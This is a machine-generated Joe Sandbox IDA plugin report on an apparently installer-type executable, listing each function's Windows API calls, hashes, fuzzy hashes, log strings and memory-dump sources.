                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID: 1974802433-0
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                                                                                                                                                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                                                                                      • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                                                                                      • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                                                                                                                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 004041AF
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000), ref: 00404251
                                                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                                                                                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 004042D2
                                                                                                                                                                                                                                                                                                                                      • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                                                                                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 004042F6
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                                                                                      • String ID: @%F$N$open
                                                                                                                                                                                                                                                                                                                                      • API String ID: 3928313111-3849437375
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                                                                                                                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                                                                                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00406B4D
                                                                                                                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                                                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                                                                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                                                                                      • String ID: F$%s=%s$NUL$[Rename]
                                                                                                                                                                                                                                                                                                                                      • API String ID: 565278875-1653569448
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                                                                                      • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                                                                                      • String ID: F
                                                                                                                                                                                                                                                                                                                                      • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                                                                                      • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                                                                                      • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                                                                                      • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                                                                                      • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                                                                                      • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                                                                                      • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                                                                                      • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                                                                                      • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                                                                                      • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
